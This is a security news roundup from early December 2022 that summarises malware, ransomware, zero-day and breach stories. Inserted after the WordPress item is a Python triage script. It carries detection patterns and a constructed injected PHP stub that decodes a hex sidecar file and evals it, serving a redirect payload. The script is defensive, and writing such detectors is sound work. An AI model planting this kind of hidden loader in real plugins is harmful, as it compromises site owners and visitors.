A new Go-based malware named 'Zerobot' has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras.BleepingComputer
December 7, 2022 – Business
Brazilian PAM Company Senhasegura Raises $13 Million Full Text
Abstract
Founded in 2010 and having a market presence in over 55 countries, the Sao Paulo-based privileged access management (PAM) vendor officially launched its North American operations in August this year.Cyware
December 7, 2022 – Vulnerabilities
Pwn2Own Toronto 2022 hacking competition. Samsung S22 hacked Full Text
Abstract
The Pwn2Own Toronto 2022 hacking competition has begun; this is the 10th anniversary of the consumer-focused version of the contest. The Samsung Galaxy S22 hack on the first day of Pwn2Own Toronto 2022 made the headlines. White hat hackers...Security Affairs
December 07, 2022 – Attack
CloudSEK claims it was hacked by another cybersecurity firm Full Text
Abstract
Indian cybersecurity firm CloudSEK says a threat actor gained access to its Confluence server using stolen credentials for one of its employees' Jira accounts.BleepingComputer
December 7, 2022 – General
Regulation won’t fix internet routing security Full Text
Abstract
Routing system security is critical to maintaining privacy online, ensuring information isn’t hijacked by malicious actors, and ensuring that the information an organization sends and receives is trustworthy.Cyware
December 7, 2022 – Vulnerabilities
Sophos fixed a critical flaw in its Sophos Firewall version 19.5 Full Text
Abstract
Sophos addressed several vulnerabilities affecting its Sophos Firewall version 19.5, including arbitrary code execution issues. Sophos has released security patches to address seven vulnerabilities in Sophos Firewall version 19.5, including some arbitrary...Security Affairs
December 07, 2022 – Malware
Hackers use new Fantasy data wiper in coordinated supply chain attack Full Text
Abstract
The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa.BleepingComputer
December 7, 2022 – Criminals
Ransomware group Vice Society targeted dozens of schools in 2022, new report finds Full Text
Abstract
More than 40 educational organizations, including 15 in the United States, suffered ransomware attacks launched by the cybercriminal group known as Vice Society, researchers at Palo Alto Networks revealed in a report published Tuesday.Cyware
December 07, 2022 – Vulnerabilities
Google: State hackers still exploiting Internet Explorer zero-days Full Text
Abstract
Google's Threat Analysis Group (TAG) revealed today that a group of North Korean hackers tracked as APT37 exploited a previously unknown Internet Explorer vulnerability (known as a zero-day) to infect South Korean targets with malware.BleepingComputer
December 7, 2022 – Phishing
Infected WordPress Plugins Redirect to Push Notification Scam Full Text
Abstract
Instead of leveraging the typical base64 encoding to evade detection, the attacker was adding variations of a PHP function to normal plugin files which decoded hex2dec from a second file containing a hexadecimal payload.Cyware
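The evasion described above, a small decoder stub added to a legitimate plugin file plus a sidecar file that is nothing but hexadecimal, defeats signatures that look for base64 blobs, but it leaves two handles for triage: the stub has to turn hex pairs back into bytes (in PHP, typically `chr(hexdec(...))`) and then execute the result, and the sidecar decodes to readable PHP or JavaScript. The following is an added example, not Sucuri's or any WordPress project's code: it flags plugin files that both decode hex pairs and execute the output, decodes a sidecar file, and reports injection markers found in the decoded text. The plugin and payload texts embedded in it are constructed for the demonstration and do not reproduce the campaign's actual code.

```python
"""Triage of a WordPress plugin file and its hex-encoded sidecar payload.

Added example; the PHP and payload strings below are constructed, not copied
from the campaign described in the article.
"""
import re

# Decoding loop: rebuilds bytes from two-character hex pairs.
HEX_LOOP = re.compile(r"chr\s*\(\s*hexdec\s*\(", re.I)
# Something has to read the sidecar file.
READS_FILE = re.compile(r"\b(file_get_contents|fopen|fread|include|require)\s*\(", re.I)
# And something has to execute the decoded text.
EXECUTES = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
# A sidecar that is purely hex digits (whitespace tolerated) is itself suspicious.
HEX_BLOB = re.compile(r"^[0-9a-fA-F\s]+$")

INJECTION_MARKERS = (
    "<script", "location.href", "location.replace",
    "Notification.requestPermission", "document.write",
)


def find_decoder_stub(php_source):
    """True when one PHP file decodes hex pairs, reads a file, and executes the result."""
    return bool(HEX_LOOP.search(php_source)
                and READS_FILE.search(php_source)
                and EXECUTES.search(php_source))


def decode_hex_payload(blob):
    """Decode a whitespace-tolerant hex file to text; None if it is not pure hex."""
    if not HEX_BLOB.match(blob):
        return None
    compact = re.sub(r"\s+", "", blob)
    if len(compact) % 2:
        return None
    return bytes.fromhex(compact).decode("utf-8", errors="replace")


def triage(plugin_php, sidecar_text):
    """Combine the stub check and the decoded sidecar into one verdict."""
    stub = find_decoder_stub(plugin_php)
    decoded = decode_hex_payload(sidecar_text)
    markers = [m for m in INJECTION_MARKERS if decoded and m in decoded]
    if stub and markers:
        verdict = "infected"
    elif stub or markers:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"stub": stub, "decoded": decoded, "markers": markers, "verdict": verdict}


# Constructed sample: a legitimate plugin file with an appended decoder stub.
INJECTED_PLUGIN_PHP = """<?php
/*
Plugin Name: Totally Normal Gallery
*/
function tng_register() { add_shortcode('tng', 'tng_render'); }
// injected stub (constructed): read a sidecar of hex pairs, rebuild the bytes, eval them
function tng_ld($f){$d=file_get_contents($f);$o='';for($i=0;$i<strlen($d);$i+=2){$o.=chr(hexdec(substr($d,$i,2)));}return $o;}
eval(tng_ld(dirname(__FILE__).'/.tng.cache'));
"""

# Constructed sample: the same plugin file without the stub.
CLEAN_PLUGIN_PHP = """<?php
/*
Plugin Name: Totally Normal Gallery
*/
function tng_register() { add_shortcode('tng', 'tng_render'); }
"""

# Constructed payload: PHP that emits a redirect to a landing page. It is
# hex-encoded at runtime here only so the sample stays readable.
PAYLOAD_PHP = "echo '<script>location.href=\"https://example.invalid/push\";</script>';"
PAYLOAD_HEX = PAYLOAD_PHP.encode().hex()

if __name__ == "__main__":
    print(triage(INJECTED_PLUGIN_PHP, PAYLOAD_HEX))
    print(triage(CLEAN_PLUGIN_PHP, ""))
```

When sweeping a real install, pair the stub check with a listing of every file under wp-content that is pure hex: the sidecar is usually a dotfile or a file with a harmless-looking extension, and its presence next to a plugin whose files have a modification time newer than the plugin's release is the tell.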
December 07, 2022 – Criminals
CryptosLabs ‘pig butchering’ ring stole up to $505 million since 2018 Full Text
Abstract
A previously unknown investment scam group named 'CryptosLabs' has stolen up to €480 million ($505 million) from victims in France, Belgium, and Luxembourg, since the launch of its operation in 2018.BleepingComputer
December 7, 2022 – Government
Maryland bans use of TikTok, other products by state agencies Full Text
Abstract
The state of Maryland banned the use of TikTok and other Chinese and Russian products by state agencies, citing reporting by NBC News about hackers linked to the Chinese government stealing millions in Covid benefits from U.S. state governments.Cyware
December 07, 2022 – Phishing
Elon Musk’s Twitter followers targeted in fake crypto giveaway scam Full Text
Abstract
Twitter accounts giving Elon Musk a follow are being targeted in a crypto giveaway scam dubbed 'Freedom Giveaway.'BleepingComputer
December 7, 2022 – Attack
South Pacific vacations may be wrecked by ransomware Full Text
Abstract
New Zealand's Privacy Commission has signaled it may open an investigation into local managed services provider Mercury IT, which serves many government agencies and businesses and has been hit by ransomware.Cyware
December 06, 2022 – Vulnerabilities
Samsung Galaxy S22 hacked twice on first day of Pwn2Own Toronto Full Text
Abstract
Contestants have hacked the Samsung Galaxy S22 smartphone twice during the first day of the Pwn2Own Toronto 2022 hacking competition, the 10th edition of the consumer-focused event.BleepingComputer
December 6, 2022 – General
68% of IT leaders are worried about API sprawl Full Text
Abstract
As per an Axway study, ensuring data security and controlling API sprawl were top concerns, with 68% worrying about complexity due to sprawl and 48% of respondents ranking “increased security challenges” as their single greatest concern.Cyware
December 6, 2022 – Denial Of Service
Russia’s second-largest bank VTB Bank under DDoS attack Full Text
Abstract
State-owned VTB Bank, the second-largest financial institution in Russia, reveals it is facing the largest DDoS (distributed denial of service) attack in its history...Security Affairs
December 06, 2022 – Solution
Kali Linux 2022.4 adds 6 new tools, Azure images, and desktop updates Full Text
Abstract
Offensive Security has released Kali Linux 2022.4, the fourth and final version of 2022, with new Azure and QEMU images, six new tools, and improved desktop experiences.BleepingComputer
December 6, 2022 – Vulnerabilities
Ninth Actively Exploited Chrome Zero-day Spotted in the Wild Full Text
Abstract
Google warned of a high-severity zero-day described as a type confusion flaw in the browser’s V8 JavaScript engine. Identified as CVE-2022-4262, the flaw could let a remote attacker exploit heap corruption via a specially crafted HTML page. Hackers exploiting it can execute RC ... Read MoreCyware
December 6, 2022 – Vulnerabilities
A flaw in the connected vehicle service SiriusXM allows remote car hacking Full Text
Abstract
Cybersecurity researchers discovered a security vulnerability in the connected vehicle service provided by SiriusXM that exposes multiple car models to remote attacks...Security Affairs
December 06, 2022 – Breach
Amnesty International Canada breached by suspected Chinese hackers Full Text
Abstract
Amnesty International's Canadian branch has disclosed a security breach detected in early October and linked by cybersecurity firm Secureworks, who investigated the incident, to a threat group likely sponsored by China.BleepingComputer
December 6, 2022 – Ransomware
Ransomware Professionalization Grows as RaaS Takes Hold Full Text
Abstract
As ransomware's prevalence has grown over the past decade, leading ransomware groups such as Conti have added services and features as part of a growing trend toward professionalization.Cyware
December 6, 2022 – Malware
Ransomware Toolkit Cryptonite turning into an accidental wiper Full Text
Abstract
Researchers spotted a version of the open-source ransomware toolkit Cryptonite that has no working decryption capability. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit...Security Affairs
December 06, 2022 – Outage
Antwerp’s city services down after hackers attack digital partner Full Text
Abstract
The city of Antwerp, Belgium, is working to restore its digital services that were disrupted last night by a cyberattack on its digital provider.BleepingComputer
December 6, 2022 – Vulnerabilities
NETGEAR Router Vulnerability Allowed Access to Restricted Services Full Text
Abstract
A new report from Tenable outlined an emerging threat related to NETGEAR and TP-Link routers. According to Tenable research, both TP-Link and NETGEAR had to release last-minute patches for their devices that were a part of the Pwn2Own event.Cyware
December 6, 2022 – Policy and Law
Crook sentenced to 18 months for stealing $20M in SIM swapping attack Full Text
Abstract
Nicholas Truglia (25), from Florida, US, was sentenced to 18 months in prison for stealing more than $20 million in a SIM swapping scheme. The DoJ announced that Truglia was sentenced to 18 months in prison for the theft of over $20 million worth...Security Affairs
December 06, 2022 – Criminals
Suspects arrested for hacking US networks to steal employee data Full Text
Abstract
Four men suspected of hacking into US networks to steal employee data for identity theft and the filing of fraudulent US tax returns have been arrested in London, UK, and Malmo, Sweden, at the request of the U.S. law enforcement authorities.BleepingComputer
December 6, 2022 – Vulnerabilities
Eufy “no cloud” security cameras streaming data to the cloud Full Text
Abstract
Eufy home security cameras are currently in a spot of trouble as a result of door camera footage. This is because it turns out that data that should not have been going to the cloud was doing so anyway in certain conditions.Cyware
December 06, 2022 – Cryptocurrency
Microsoft: Hackers target cryptocurrency firms over Telegram Full Text
Abstract
Microsoft says that cryptocurrency investment companies have been targeted by a threat group it tracks as DEV-0139 via Telegram groups used to communicate with the firms' VIP customers.BleepingComputer
December 06, 2022 – Vulnerabilities
Android December 2022 security updates fix 81 vulnerabilities Full Text
Abstract
Google has released the December 2022 security update for Android, fixing four critical-severity vulnerabilities, including a remote code execution flaw exploitable via Bluetooth.BleepingComputer
December 06, 2022 – Outage
Rackspace confirms outage was caused by ransomware attack Full Text
Abstract
Texas-based cloud computing provider Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage described as an "isolated disruption."BleepingComputer
December 06, 2022 – Denial Of Service
Massive DDoS attack takes Russia’s second-largest bank VTB offline Full Text
Abstract
Russia's second-largest financial institution VTB Bank says it is facing the worst cyberattack in its history after its website and mobile apps were taken offline due to an ongoing DDoS (distributed denial of service) attack.BleepingComputer
December 06, 2022 – General
Password Reset Calls Are Costing Your Org Big Money Full Text
Abstract
Research states that the average help desk labor cost for a single password reset is about $70. With this cost, what can an organization do to lessen the impact of password resets?BleepingComputer
December 05, 2022 – General
Microsoft warns of Russian cyberattacks throughout the winter Full Text
Abstract
Microsoft has warned of Russian-sponsored cyberattacks continuing to target Ukrainian infrastructure and NATO allies in Europe throughout the winter.BleepingComputer
December 05, 2022 – Government
CISA orders agencies to patch exploited Google Chrome bug by Dec 26th Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added one more security vulnerability to its list of bugs known to be exploited in attacks.BleepingComputer
December 5, 2022 – Criminals
India: Hackers Selling Personal Data Of 150,000 Patients From Tamil Nadu Hospital On Dark Web Full Text
Abstract
The seller shared a sample as proof, showing data records dated from the years 2007-2011. The data set of 150,000 records of patients' information includes their name, guardian name, date of birth, doctor's details, and address information.Cyware
December 5, 2022 – Outage
French hospital cancels operations after a ransomware attack Full Text
Abstract
A French hospital near Paris canceled operations and transferred some patients due to a cyberattack suffered over the weekend. France's health ministry announced that the Hospital Centre of Versailles was hit by a cyberattack over the weekend. Hospital...Security Affairs
December 05, 2022 – Attack
Ransomware attack forces French hospital to transfer patients Full Text
Abstract
The André-Mignot teaching hospital in the suburbs of Paris had to shut down its phone and computer systems because of a ransomware attack that hit on Saturday evening.BleepingComputer
December 5, 2022 – Vulnerabilities
Attackers Target Vulnerable Redis Servers to Deliver Redigo Backdoor Full Text
Abstract
Security firm AquaSec spotted a new Go-based malware, dubbed Redigo, launching attacks on Redis servers. The adversaries are exploiting an already patched critical flaw, CVE-2022-0543, in Redis servers. The flaw (CVSS score 10.0) is a Lua sandbox escape that impacts Debian and Debian-derived Lin ... Read MoreCyware
December 5, 2022 – Malware
Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web Full Text
Abstract
Resecurity has identified a new underground marketplace in the Dark Web oriented towards mobile malware developers and operators. "In the Box" dark web marketplace is leveraged by cybercriminals to attack over 300 financial institutions (FIs), payment...Security Affairs
December 05, 2022 – Hacker
Sneaky hackers reverse defense mitigations when detected Full Text
Abstract
A financially motivated threat actor is hacking telecommunication service providers and business process outsourcing firms, actively reversing defensive mitigations applied when the breach is detected.BleepingComputer
December 5, 2022 – Attack
‘Cybersecurity incident’ hits San Diego Unified computer network Full Text
Abstract
District Superintendent Lamont Jackson on Thursday sent a letter to his staff and families of students attending SDUSD campuses to apprise them of what he described as a "cybersecurity incident."Cyware
December 5, 2022 – Vulnerabilities
Critical Ping bug potentially allows remote hack of FreeBSD systems Full Text
Abstract
A critical stack-based buffer overflow bug in the ping utility, tracked as CVE-2022-23093, can allow an attacker to take over FreeBSD systems; note that FreeBSD's ping runs in a Capsicum capability-mode sandbox, which constrains what a successful exploit can do at the point where the bug is reached. The maintainers of the FreeBSD operating system released updates to address the critical flaw, tracked as CVE-2022-23093,...Security Affairs
December 05, 2022 – Hacker
Hackers hijack Linux devices using PRoot isolated filesystems Full Text
Abstract
Hackers are abusing the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that work on many Linux distributions.BleepingComputer
December 5, 2022 – Malware
Platform Certificates Used to Sign Android Malware Installers and Droppers Full Text
Abstract
Several platform certificates, belonging to LG Electronics, Revoview, Mediatek, and Samsung Electronics, were found being abused by threat actors to sign malicious Android apps. Google recommends vendors minimize the number of applications signed with the platform certificate to lower the cost of p ... Read MoreCyware
December 5, 2022 – APT
Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware Full Text
Abstract
The North Korea-linked Lazarus APT is spreading fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency...Security Affairs
December 05, 2022 – Vulnerabilities
Severe AMI MegaRAC flaws impact servers from AMD, ARM, HPE, Dell, others Full Text
Abstract
Three vulnerabilities in the American Megatrends MegaRAC Baseboard Management Controller (BMC) software impact server equipment used in many cloud service and data center providers. – BleepingComputer
December 5, 2022 – Vulnerabilities
Google Patches Ninth Chrome Zero-Day of 2022 Full Text
Abstract
Patches for this vulnerability have been included in Chrome 108.0.5359.94 for Mac and Linux, and in Chrome 108.0.5359.94/.95 for Windows. Users are advised to update to a patched iteration as soon as possible. – Cyware
December 5, 2022 – Outage
Rackspace Shuts Down Hosted Exchange Systems Due to Security Incident Full Text
Abstract
Rackspace has not said if this is caused by ransomware or another type of cyberattack, and it's also unclear if there was any data breach involving customer information or other kinds of information. – Cyware
December 5, 2022 – Phishing
Chinese Gambling Spam Targets World Cup Keywords Full Text
Abstract
The attack affects mostly Chinese websites, but we’ve found a number of western websites also affected by the malicious injections. According to PublicWWW data, the number of infected sites exceeds 50,000 at the time of writing. – Cyware
December 5, 2022 – Breach
DeFi Protocol Ankr Suffers $5 Million Theft; Promises to Reimburse Affected Users Full Text
Abstract
"We will take a snapshot and reissue ankrBNB to all valid aBNBc holders before the exploit. The ankrBNB token will continue to be redeemable, while aBNBc and aBNBb will no longer be redeemable," Ankr said in a tweet after the exploit. – Cyware
December 5, 2022 – Attack
India: Safdarjung Hospital reports cyberattack but not ransomware; AIIMS server down for 11th day Full Text
Abstract
According to the officials, the Safdarjung hospital runs OPD services manually, and therefore the impact was not severe. Meanwhile, the AIIMS server remained down for the 11th day today. – Cyware
December 5, 2022 – Criminals
DuckLogs Advertises its Features and MaaS Capabilities on Cybercrime Forums Full Text
Abstract
Cyble research team has unearthed a new MaaS operation dubbed DuckLogs. It reportedly offers beginners and other cyber attackers easy access to malicious modules. DuckLogs mainly includes an information stealer and a RAT component. The malware is most likely distributed using spam or phishing email... – Cyware
December 04, 2022 – Malware
Android malware apps with 2 million installs spotted on Google Play Full Text
Abstract
A new set of Android malware, phishing, and adware apps has infiltrated the Google Play store, tricking over two million people into installing them. – BleepingComputer
December 4, 2022 – Privacy
Law enforcement agencies can extract data from thousands of cars’ infotainment systems Full Text
Abstract
Law enforcement agencies can extract data from the infotainment systems of thousands of different car models. Data managed by infotainment systems in modern vehicles is a valuable source of information for law enforcement investigations. Modern... – Security Affairs
December 4, 2022 – Government
US DHS Cyber Safety Board will review Lapsus$ gang’s operations Full Text
Abstract
US DHS Cyber Safety Review Board will review attacks linked to the Lapsus$ extortion gang that hit multiple high-profile companies. The Department of Homeland Security (DHS) Cyber Safety Review Board announced that it will review cyberattacks linked... – Security Affairs
December 4, 2022 – Malware
New CryWiper wiper targets Russian entities masquerading as a ransomware Full Text
Abstract
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor's offices and courts. Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive... – Security Affairs
December 4, 2022 – General
Security Affairs newsletter Round 396 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter has arrived! Every week, the best security articles from Security Affairs are delivered free to your inbox. If you also want to receive the free newsletter covering the international press, subscribe here. Google... – Security Affairs
December 3, 2022 – Malware
Schoolyard Bully Trojan Steals Facebook Credentials Full Text
Abstract
Schoolyard Bully Trojan, a new Android threat campaign, victimized over 300,000 users across 71 countries. The malware steals Facebook credentials pretending to be educational apps. Experts found 37 apps associated with this campaign and these are actively being distributed via third-party app stor... – Cyware
December 03, 2022 – Policy and Law
SIM swapper gets 18-months for involvement in $22 million crypto heist Full Text
Abstract
Florida man Nicholas Truglia was sentenced to 18 months in prison on Thursday for his involvement in a fraud scheme that led to the theft of millions from cryptocurrency investor Michael Terpin. – BleepingComputer
December 3, 2022 – Criminals
Cybercriminal Organizations Offer Record High Reward for Signal App Zero-Days Full Text
Abstract
The gray market for exploit brokers is growing, and much of the credit goes to an ongoing bidding war in which a new entrant has bid millions for Signal messaging app zero-days. The reasons behind this bidding war include Android's overwhelming 80% market share in Ukraine and... – Cyware
December 03, 2022 – Cryptocurrency
Hackers use new, fake crypto app to breach networks, steal cryptocurrency Full Text
Abstract
The North Korean 'Lazarus' hacking group is linked to a new attack spreading fake cryptocurrency apps under the made-up brand, "BloxHolder," to install the AppleJeus malware for initial access to networks and steal crypto assets. – BleepingComputer
December 3, 2022 – Vulnerabilities
Three Innocuous Linux Vulnerabilities Chained to Obtain Full Root Privileges Full Text
Abstract
Qualys’ Threat Research Unit has shown how a new Linux vulnerability could be chained with two other apparently harmless flaws to gain full root privileges on an affected system. – Cyware
December 3, 2022 – Vulnerabilities
Mitsubishi Electric PLCs Exposed to Attacks by Engineering Software Flaws Full Text
Abstract
Researchers at industrial cybersecurity firm Nozomi Networks have discovered three vulnerabilities in Mitsubishi Electric’s GX Works3 engineering workstation software that could be exploited to hack safety systems. – Cyware
December 3, 2022 – Government
FBI warns about Cuba, no, not that one — the ransomware gang Full Text
Abstract
The Cuba gang has hit more than 100 organizations worldwide, demanding over $145 million in payments and successfully extorting at least $60 million since August, according to a joint FBI and CISA advisory. – Cyware
December 3, 2022 – Vulnerabilities
Google fixed the ninth actively exploited Chrome zeroday this year Full Text
Abstract
Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild. Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked... – Security Affairs
December 3, 2022 – Vulnerabilities
A new Linux flaw can be chained with other two bugs to gain full root privileges Full Text
Abstract
Qualys researchers demonstrated how to chain a new Linux flaw with two other issues to gain full root privileges on an impacted system. Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked... – Security Affairs
December 02, 2022 – Ransomware
The Week in Ransomware - December 2nd 2022 - Disrupting Health Care Full Text
Abstract
This week's big news was the Colombia health system being severely disrupted by a ransomware attack on Keralty, one of the country's largest healthcare providers. – BleepingComputer
December 2, 2022 – Malware
Wipers Are Widening: Here’s Why That Matters Full Text
Abstract
In the first half of this year, researchers saw a rising trend of wiper malware being deployed in parallel with the Russia-Ukraine war. However, those wipers haven’t stayed in one place – they’re emerging globally. – Security Week
Dec 02, 2022 – Hacker
Hackers Sign Android Malware Apps with Compromised Platform Certificates Full Text
Abstract
Platform certificates used by Android smartphone vendors like Samsung, LG, and MediaTek have been found to be abused to sign malicious apps. The findings were first discovered and reported by Google reverse engineer Łukasz Siewierski on Thursday. "A platform certificate is the application signing certificate used to sign the 'android' application on the system image," a report filed through the Android Partner Vulnerability Initiative (AVPI) reads. "The 'android' application runs with a highly privileged user id – android.uid.system – and holds system permissions, including permissions to access user data." This effectively means that a rogue application signed with the same certificate can gain the highest level of privileges as the Android operating system, permitting it to harvest all kinds of sensitive information from a compromised device. The list of malicious Android app packages that have abused the certificates is below - com. – The Hacker News
December 2, 2022 – General
The Benefits and Risks of Extending Weapons Deliveries to the Cyber Domain Full Text
Abstract
While NATO members continue to supply weapons to Ukraine, they should consider the benefits and risks associated with extending these deliveries to include cyber weapons. – Lawfare
December 02, 2022 – Vulnerabilities
Google Chrome emergency update fixes 9th zero-day of the year Full Text
Abstract
Google has released Chrome 108.0.5359.94/.95 for Windows, Mac, and Linux users to address a single high-severity security flaw, the ninth Chrome zero-day exploited in the wild patched since the start of the year. – BleepingComputer
December 2, 2022 – Phishing
Nigeria-based group ‘Lilac Wolverine’ using COVID-19, emotional lures in BEC scams Full Text
Abstract
A cybercrime group based in Nigeria is targeting businesses in the United States and Western Europe with a plethora of scam emails as part of a larger campaign of business email compromise (BEC) attacks. – The Record
Dec 02, 2022 – Government
CISA Warns of Multiple Critical Vulnerabilities Affecting Mitsubishi Electric PLCs Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week released an Industrial Control Systems (ICS) advisory warning of multiple vulnerabilities in Mitsubishi Electric GX Works3 engineering software. "Successful exploitation of these vulnerabilities could allow unauthorized users to gain access to the MELSEC iQ-R/F/L series CPU modules and the MELSEC iQ-R series OPC UA server module or to view and execute programs," the agency said. GX Works3 is an engineering workstation software used in ICS environments, acting as a mechanism for uploading and downloading programs from/to the controller, troubleshooting software and hardware issues, and performing maintenance operations. The wide range of functions also makes it an attractive target for threat actors looking to compromise such systems to commandeer the managed PLCs. Three of the 10 shortcomings relate to cleartext storage of sensitive data, four relate to the use of a hard-coded cryptograp – The Hacker News
December 2, 2022 – General
Attack of drones: airborne cybersecurity nightmare Full Text
Abstract
Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn. Original post at https://cybernews.com/security/drones-hack-airborne-cybersecurity-nightmare/ Once a niche technology, drones are about... – Security Affairs
December 02, 2022 – Government
DHS Cyber Safety Board to review Lapsus$ gang’s hacking tactics Full Text
Abstract
The Department of Homeland Security (DHS) Cyber Safety Review Board will review attacks linked to an extortion group known as Lapsus$, which breached multiple high-profile companies in recent attacks. – BleepingComputer
December 2, 2022 – Outage
Vatican website down in suspected hacker attack Full Text
Abstract
The official Vatican website was taken offline on Wednesday following an apparent hacking attack, the Holy See said. "Technical investigations are ongoing due to abnormal attempts to access the site," Vatican spokesman Matteo Bruni said. – Reuters
Dec 02, 2022 – General
The Value of Old Systems Full Text
Abstract
Old technology solutions – every organization has a few of them tucked away somewhere. It could be an old and unsupported storage system or a tape library holding the still-functional backups from over 10 years ago. This is a common scenario with software too. For example, consider an accounting software suite that was extremely expensive when it was purchased. If the vendor eventually went under, then there's no longer any support for the software – which means that the accounting solution only works on some older operating system that isn't supplied with updates either. How valuable is it to keep older solutions like this running? Well, organizations don't enjoy running old legacy systems just for the pleasure of it, but they're often forced to keep them running because it's their only option, or at least the only cost-effective option available to them. If it works, it works…? From a purely functional perspective, there is usually no problem with old te – The Hacker News
December 2, 2022 – Criminals
Cuba Ransomware received over $60M in Ransom payments as of August 2022 Full Text
Abstract
Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022. The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million... – Security Affairs
December 02, 2022 – Hacker
BlackProxies proxy service increasingly popular among hackers Full Text
Abstract
A new residential proxy market is becoming popular among hackers, cybercriminals, phishers, scalpers, and scammers, selling access to a million claimed proxy IP addresses worldwide. – BleepingComputer
December 2, 2022 – General
Financial organizations more prone to accidental data leakage Full Text
Abstract
According to the Netwrix 2022 Cloud Security Report, compared to other industries surveyed, financial institutions are much more concerned about users who have legitimate access to their cloud infrastructure. – Help Net Security
Dec 02, 2022 – Vulnerabilities
Researchers Disclose Supply-Chain Flaw Affecting IBM Cloud Databases for PostgreSQL Full Text
Abstract
IBM has fixed a high-severity security vulnerability affecting its Cloud Databases (ICD) for PostgreSQL product that could be potentially exploited to tamper with internal repositories and run unauthorized code. The privilege escalation flaw (CVSS score: 8.8), dubbed "Hell's Keychain" by cloud security firm Wiz, has been described as a "first-of-its-kind supply-chain attack vector impacting a cloud provider's infrastructure." Successful exploitation of the bug could enable a malicious actor to remotely execute code in customers' environments and even read or modify data stored in the PostgreSQL database. "The vulnerability consists of a chain of three exposed secrets (Kubernetes service account token, private container registry password, CI/CD server credentials) coupled with overly permissive network access to internal build servers," Wiz researchers Ronen Shustin and Shir Tamari said. Hell's Keychain commences with an SQL inject – The Hacker News
December 2, 2022 – Malware
Android Keyboard Apps with 2 Million downloads can remotely hack your device Full Text
Abstract
Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone. Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively... – Security Affairs
December 02, 2022 – Malware
New CryWiper data wiper targets Russian courts, mayor’s offices Full Text
Abstract
A previously undocumented data wiper named CryWiper is masquerading as ransomware, extorting victims to pay for a decrypter, but in reality, it just destroys data beyond recovery. – BleepingComputer
December 2, 2022 – Attack
New Zealand health insurer Accuro says it’s been hacked, can’t rule out customers’ data being accessed Full Text
Abstract
Accuro, a New Zealand health insurer, says a cybersecurity incident has compromised its ability to access systems but it's not yet known whether customer data is exposed. – Newshub
Dec 02, 2022 – Hacker
Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers Full Text
Abstract
A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network. The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo, according to cloud security firm Aqua. Tracked as CVE-2022-0543 (CVSS score: 10.0), the weakness pertains to a case of sandbox escape in the Lua scripting engine that could be leveraged to attain remote code execution. This is not the first time the flaw has come under active exploitation, what with Juniper Threat Labs uncovering attacks perpetrated by the Muhstik botnet in March 2022 to execute arbitrary commands. The Redigo infection chain is similar in that the adversaries scan for exposed Redis servers on port 6379 to establish initial access, following it up by downloading a shared library "exp_lin.so" from a remote server. – The Hacker News
December 02, 2022 – Criminals
Police arrest 55 members of ‘Black Panthers’ SIM Swap gang Full Text
Abstract
The Spanish National Police have arrested 55 members of the 'Black Panthers' cybercrime group, including one of the organization's leaders based in Barcelona. – BleepingComputer
December 2, 2022 – Outage
Internet issues caused by ‘unauthorized third party’ close South Jersey school Full Text
Abstract
Classes are canceled for the third day in a row in a Gloucester County school district due to technical problems caused by an "unauthorized third party," according to notifications from the district. – 6ABC
Dec 02, 2022 – Education
What the CISA Reporting Rule Means for Your IT Security Protocol Full Text
Abstract
The new Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA) requires CISA to create rules regarding cyber incident reporting by critical infrastructure organizations. The RFI and hearings precede a Notice of Proposed Rulemaking (NPRM) that CISA must publish sooner than 24 months from the enactment of CIRCIA, which the President signed into law in March. The sessions and NPRM are steps toward creating the new rule. CISA is soliciting expert opinion on what to include in a report but is taking steps to implement the change soon. Here's what that change means for businesses in the US and what you can do about it now. Overview of the CISA reporting rule: Owners and operators of critical infrastructure must file cyber incident reports with CISA within 72 hours. They must report ransom payments for ransomware attacks within 24 hours. Other businesses can take part voluntarily. The CISA Director can subpoena organizations in noncompliance to compel – The Hacker News
December 02, 2022 – Solution
How Windows 11’s Enhanced Phishing Protection guards your password Full Text
Abstract
One of the easier ways to steal a user's credentials is through a convincing fake login page or application. To help combat the constant risk of password theft, Microsoft added enhanced phishing protection in Windows 11 Version 22H2. – BleepingComputer
December 2, 2022 – Malware
Archive files become preferred format for malware delivery Full Text
Abstract
The team at HP Wolf Security found that cybercriminals are using archive files as the preferred method for spreading malware, beating Microsoft Office for the first time. – Tech Target
Dec 02, 2022 – Malware
Watch Out! These Android Keyboard Apps With 2 Million Installs Can be Hacked Remotely Full Text
Abstract
